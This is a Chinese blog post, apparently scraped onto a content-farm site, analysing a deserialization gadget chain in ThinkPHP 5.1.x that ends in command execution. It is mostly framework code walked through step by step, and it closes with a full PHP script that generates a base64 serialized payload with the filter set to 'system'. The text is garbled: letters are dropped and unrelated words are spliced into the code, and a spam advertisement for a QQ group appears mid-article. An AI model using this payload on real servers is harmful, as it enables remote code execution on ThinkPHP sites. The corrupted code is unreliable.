首页 > 作文

ThinkPHP v5.1.x POP 链分析

更新时间:2023-04-07 20:56:53 阅读: 评论:0

环境:macos 10.13 mamap prophp 7.0.33 + xdebugvisual studio code前言我所理解的 pop chain:利用魔术方法并巧妙构造特殊属性调用一系列函数或类方法以执行某种敏感操作的调用堆栈反序列化常用魔法函数

前言
我所理解的 pop chain:
利用魔术方法并巧妙构造特殊属性调用一系列函数或类方法以执行某种敏感操作的调用堆栈

反序列化常用魔法函数

 1 __wakeup, unrialize() 执行前调用 2 __destruct, 对销毁的时候调用 3 __音乐论文tostring, 类被当成字符串时的回应方法 4 __construct(),当对象创建(new)时会自动调用,注意在 5 unrialize()时并不会自动调用 6 __sleep(),rialize()时会先被调用 7 __call(),在对象中调用一个不可访问方法时调用 8 __callstatic(),用静态方式中调用一个不可访问方法时调用 9 __get(),获得一个类的成员变量时调用10 __t(),设置一个类的成员变量时调用11 __ist(),当对不可访问属性调用ist()或empty()时调用12 __unt(),当对不可访问属性调用unt()时被调用。13 __wakeup(),执行unrialize()时,先会调用这个函数14 __tostring(),类被当成字符串时的回应方法15 __invoke(),调用函数的方式调用一个对象时的回应方法16 __t_state(),调用var_export()导出类时,此静态方法会被调用。17 __clone(),当对象复制完成时调用18 __autoload(),尝试加载未定义的类19 __debuginfo(),打印所需调试信息

phar 文件通过 phar:// 伪协议拓宽攻击面 因为 phar 文件会以序列化的形式存储用户自定义的meta-data,所以在文件系统函数(file_exists()、is_dir()等)参数可控的情况下,配合phar://伪协议,可以不依赖unrialize()直接进行反序列化操作,深入了解请至:

如果对反序列化没有了解的话建议先学习下相关内容thinkphp v5.1.x pop 链分析安装这里使用的是官方 thinkphp v5.1.38compor 部署compor create-project topthink/think=5.1.38 tp5.1.38利用链全局打嗝原因搜索函数 __destruct

来到 /thinkphp/library/think/process/pipes/windows.php

 1 public function __destruct() 2     { 3         $this->clo(); 4         $this->removefiles(); 5     } 6     . . .  . . .  7     /** 8      * 删除临时文件 9      */10     private function removefiles()11     {12         foreach ($this->files as $filename) {13             if (file_exists($filename)) {14                 @unlink($filename);15             }16         }17         $this->files = [];18     }

看下 file_exists 的描述f

1 ile_exists ( string $filename ) 

复制代码

: bool如果传入的 $filename 是个反序列化的对象,在被 file_exists 当作字符串处理的时候就会触发其 __tostring 方法(如果有的话)所以下面就是找含 __tostring 方法的类

来到 /thinkphp/library/think/model/concern/conversion.php

1 public function tojson($options = json_unescaped_unicode)2     {3         return json_encode($this->toarray(), $options);4     }5     . . .   . . . 6     public f除草unction __tostring()7     {8         return $this->tojson();9     }

可以看到,在 tojson() 函数中又调用了 toarray() 函数如果 toarray() 函数中存在并使用某个可控变量的方法,那么我们就可以利用这点去触发其他类的 __call 方法下面是 toarray() 函数的定义,$this->append 作为类属性是可控的,所以 $relation 和 $name 也就可控了,于是 $relation->visible($name); 就成了这个 pop 链中的中间跳板

phper在进阶的时候总会遇到一些问题和瓶颈,业务代码写多了没有方向感,不知道该从那里入手去提升,对此我整理了一些资料,包括但不限于:分布式架构、高可扩展、高性能、高并发、服务器性能调优、tp6,laravel,yii2,redis,swoole、kafka、mysql优化、shell脚本、docker、微服务、nginx等多个知识点高级进阶干货需要的可以免费分享给大家,需要的(点击→)我的官方群677079770https://jq.qq.com/?_wv=1027&k=5boemvl

 1 public function toarray() 2 { 3     $item       = []; 4     $hasvisible = fal; 5     . . .   . . . 6     // 追加属性(必须定义获取器) 7     if (!empty($this->append)) { 8         foreach ($this->append as $key => $name) { 9             if (is_array($name)) {10                 // 追加关联对象属性11                 $relation = $this->getrelation($key);12                 if (!$relation) {13                     $relation = $this->getattr($key);14                     if ($relation) {15                         $relation->visible($name);16                     }17                 }18                 $item[$key] = $relation ? $relation->append($name)->toarray() : [];19             } elif (strpos($name, '.')) {20            . . .   . . .   21             } el {22                 $item[$name] = $this->getattr($name, $item);23             }24         }25     }26     return $item;27 }

那我们在这里应该传入怎么样的值以及什么数据呢,先看下 $relation 是如何处理得到的

跟进 getrelation,在 /thinkphp/library/think/model/concern/relationship.php 中找到函数定义

 1 trait relationship 2 { 3     . . .   . . .  4     /** 5      * 获取当前模型的关联模型数据 6      * @access public 7      * @param  string $name 关联方法名 8      * @return mixed 9      */10     public function getrelation($name = null)11     {12         if (is_null($name)) {13             return $this->relation;14         } elif (array_key_exists($name, $this->relation)) {15             return $this->relation[$name];16         }17         return;18     }19     . . .   . . . 20 }

由于 getrelation 最终都会 return; 导致返回 null,所以 下面的 if (!$relation) 一定成立所以直接跟进后面的 getattr,在 /thinkphp/library/think/model/concern/attribute.php 找到其定义

 1 trait attribute 2 { 3     . . .   . . . 4     public function getdata($name = null) 5     { 6         if (is_null($name)) { 7             return $this->data; 8         } elif (array_key_exists($name, $this->data)) { 9             return $this->data[$name];10         } elif (array_key_exists($name, $this->relation)) {11             return $this->relation[$name];12         }13         throw new invalidargumentexception('property not exists:' . static::class . '->' . $name);14     }15     . . .   . . . 16     public function getattr($name, &$item = null)17     {18         try {19             $notfound = fal;20             $value    = $this->getdata($name);21         } catch (invalidargumentexception $e) {22             $notfound = true;23             $value    = null;24         }25         . . .  . . . 26     }27 }

从 getattr —> getdata 返回 data 数组中同名键值的元素值,即 $relation <—- $this->data[$name],我们需要的 $data 和 $append 分别位于 attribute 和 conversion,且两者都是 trait 类型trait 可以说是和 class 相似,是 php 5.4.0 开始实现的一种代码复用的方法,可以使用 u 加载

详情可以看官方手册 php: trait – manual

所以接下来是寻找一个同时使用了 attribute 和 conversion 的类

发现只有 /thinkphp/library/think/model.php 满足条件

1 abstract class model implements \jsonrializable, \arrayaccess2 {3     u model\concern\attribute;4     u model\concern\relationship;5     u model\concern\modelevent;6     u model\concern\timestamp;7     u model\concern\conversion;8     . . .   . . .9 }

下面就需要找到一个没有 visible 方法却有 __call 方法的类作为执行点找到 /thinkphp/library/think/request.php 中的 request 类

 1 class request 2 { 3     . . .   . . .  4     /** 5      * 扩展方法 6      * @var array 7      */ 8     protected $hook = []; 9     . . .   . . . 10     public function __call($method, $args)11     {12         if (array_key_exists($method, $this->hook)) {13             array_unshift($args, $this);14             return call_ur_func_array($this->hook[$method], $args);15         }16         throw new exception('method not exists:' . static::class . '->' . $method);17     }18     . . .   . . .19 }

这里的回调参数来源于 $hook 数组,而且方法名和参数都是可控的,不过 array_unshift 函数会把若干元素前置到数组的开头

 1  $queue = array("orange", "banana"); 2 array_unshift($queue, "apple", "raspberry"); 3 print_r($queue); 4 /// 5 array 6 ( 广东公务员面试7     [0] => apple 8     [1] => raspberry 9     [2] => orange10     [3] => banana11 )

这样的话明显就很难执行命令了,因为参数数组的第一个元素始终是 $this,无法直接执行我们想要的命令, 需要其他某种对参数不是这么敏感的函数作为一个新的执行点或者跳板request 类中有一个 filtervalue 函数具有过滤功能,寻找调用 filtervalue 的地方以便控制 $value 和 $filters 好执行命令

 1 private function filtervalue(&$value, $key, $filters) 2     { 3         $default = array_pop($filters); 4         foreach ($filters as $filter) { 5             if (is_callable($filter)) { 6                 // 调用函数或者方法过滤 7                 $value = call_ur_func($filter, $value); 8             } elif (is_scalar($value)) { 9              . . .   . . .         10              }11         return $value;12     }

request 类中的 input 函数由 array_walk_recursive 调用了 filtervalue,但是参数仍不可控,再往上寻找调用点看看

 1 public function input($data = [], $name = '', $default = null, $filter = '') 2     { 3         if (fal === $name) { 4             // 获取原始数据 5             return $data; 6         } 7         $name = (string) $name; 8         if ('' != $name) { 9             // 解析name10             if (strpos($name, '/')) {11                 list($name, $type) = explode('/', $name);12             }13             $data = $this->getdata($data, $name);14             if (is_null($data)) {15                 return $default;16             }17             if (is_object($data)) {18                 return $data;19             }20         }21         // 解析过滤器22         $filter = $this->getfilter($filter, $default);23         if (is_array($data)) {24             array_walk_recursive($data, [$this, 'filtervalue'], $filter);25             if (version_compare(php_version, '7.1.0', '<')) {26                 // 恢复php版本低于 7.1 时 array_walk_recursive 中消耗的内部指针27                 $this->arrayret($data);28             }29         } el {30             $this->filtervalue($data, $name, $filter);31         }32         . . .   . . . 33         return $data;34     }

复制代码

request 类中的 param 函数调用了 input 函数,但同样参数不可控,再往上寻找调用点

 1 public function param($name = '', $default = null, $filter = '') 2     { 3         . . .   . . . 4         if (true === $name) { 5             // 获取包含文件上传信息的数组 6             $file = $this->file(); 7             $data = is_array($file) ? array_merge($this->param, $file) : $this->param; 8             return $this->input($data, '', $default, $filter); 9         }10         return $this->input($this->param, $name, $default, $filter);11     }

转到 isajax 函数的定义

 1 public function isajax($ajax = fal) 2     { 3         $value  = $this->rver('http_x_requested_with'); 4         $result = 'xmlhttprequest' == strtolower($value) ? true : fal; 5         if (true === $ajax) { 6             return $result; 7         } 8         $result           = $this->param($this->config['var_ajax']) ? true : $result; 9         $this->mergeparam = fal;10         return $result;11     }

这里 $ajax 参数没有对类型的限制,而且 param 的参数来自 $this->config,是可控的,param 在最后所调用的 input 函数的 $this->param, $name 就都可控跟进 get 和 route 函数不难发现 $this->param 的值来自 get 请求

1 // 当前请求参数和url地址中的参数合并2 $this->param = array_merge($this->param, $this->get(fal), $vars, $this->route(fal));3 /*4 http://127.0.0.1:9000/public/?test=pwd5 $this->param = array("test"=>"pwd")6 */

那么回到 input 函数看处理流程

首先 $this->getdata($data, $name) 得到 $data,跟进分析,返回 $data 为 $data[$val] 的值,即 $data柳永的诗词[$name]

 1 protected function getdata(array $data, $name) 2     { 3         foreach (explode('.', $name) as $val) { 4             if (ist($data[$val])) { 5                 $data = $data[$val]; 6             } el { 7                 return; 8             } 9         }10         return $data;11     }

回到 input,接着处理 $filter = $this->getfilter($filter, $default);getfilter 的两个参数分别为 ” 和 null 且都不可控,但是跟进不难看出最后返回 $filter 的值就是 $this->filter,虽然后面 $filter[] = $default; 会给 filter 数组追加个值为 null 的元素,但后面 filtervalue 中的 array_pop 函数正好给去掉了

 1 protected function getfilter($filter, $default) 2     { 3         if (is_null($filter)) { 4             $filter = []; 5         } el { 6             $filter = $filter ?: $this->filter; 7             if (is_string($filter) && fal === strpos($filter, '/')) { 8                 $filter = explode(',', $filter); 9             } el {10                 $filter = (array) $filter;11             }12         }13         $filter[] = $default;14         return $filter;15     }

这样就得到一条可控变量的函数调用链,最后执行命令

下面简单梳理下流程 通过 windows 类 __destruct() 方法调用到 file_exists 触发某类的 __tostring() 来到 toarray() 函数 通过控制分别位于 attribute 和 conversion 的 $data 和 $append 变量执行在 request 中不存在的 visible 函数进而触发其 __call() 在 request 通过控制 $hook $filter $config 三个变量的值注入最终的 callback 名称和参数,再经这么一系列函数调用执行命令

1 __call() ---> call_ur_func_array() ---> isajax() ---> param() ---> input() ---> filtervalue() ---> call_ur_func()

构造 payload

由于 model 类是 abstract 类型,无法实例化,而extends model 的也只有一个 pivot 类,所以就用它吧

 1 <?php 2 namespace think; 3 abstract class model 4 { 5     protected $append = []; 6     private $data = []; 7     function __construct(){ 8         $this->append = ["a"=>[""]]; 9         $this->data = ["a"=>new request()];10     }11 }12 namespace think\model;13 u think\model;14 class pivot extends model15 {16 }17 namespace think\process\pipes;18 u think\model\pivot;19 class windows20 {21     private $files = [];22     public function __construct()23     {24         $this->files = [new pivot()];25     }26 }27 namespace think;28 class request29 {30     protected $hook = [];31     protected $filter = "system";32     protected $config = [33         // 表单请求类型伪装变量34         'var_method'       => '_method',35         // 表单ajax伪装变量36         'var_ajax'         => '_ajax',37         // 表单pjax伪装变量38         'var_pjax'         => '_pjax',39         // pathinfo变量名 用于兼容模式40         'var_pathinfo'     => 's',41         // 兼容path_info获取42         'pathinfo_fetch'   => ['orig_path_info', 'redirect_path_info', 'redirect_url'],43         // 默认全局过滤方法 用逗号分隔多个44         'default_filter'   => '',45         // 域名根,如thinkphp.cn46         'url_domain_root'  => '',47         // https代理标识48         'https_agent_name' => '',49         // ip代理获取标识50         'http_agent_ip'    => 'http_x_real_ip',51         // url伪静态后缀52         'url_html_suffix'  => 'html',53     ];54     function __construct(){55         $this->filter = "system";56         $this->config = ["var_ajax"=>''];57         $this->hook = ["visible"=>[$this,"isajax"]];58     }59 }60 u think\process\pipes\windows;61 echo ba64_encode(rialize(new windows()));

自己先构造一个利用点反序列化我们的内容,生成好 payload,get 传入要执行的命令,命令别忘了 urlencode

查看调用堆栈

本文发布于:2023-04-07 20:56:49,感谢您对本站的认可!

本文链接:https://www.wtabcd.cn/fanwen/zuowen/74c47e6e87e8aae14c8bdb3e49c3310b.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

本文word下载地址:ThinkPHP v5.1.x POP 链分析.doc

本文 PDF 下载地址:ThinkPHP v5.1.x POP 链分析.pdf

标签:函数   方法   参数   时调
相关文章
留言与评论(共有 0 条评论)
   
验证码:
Copyright ©2019-2022 Comsenz Inc.Powered by © 专利检索| 网站地图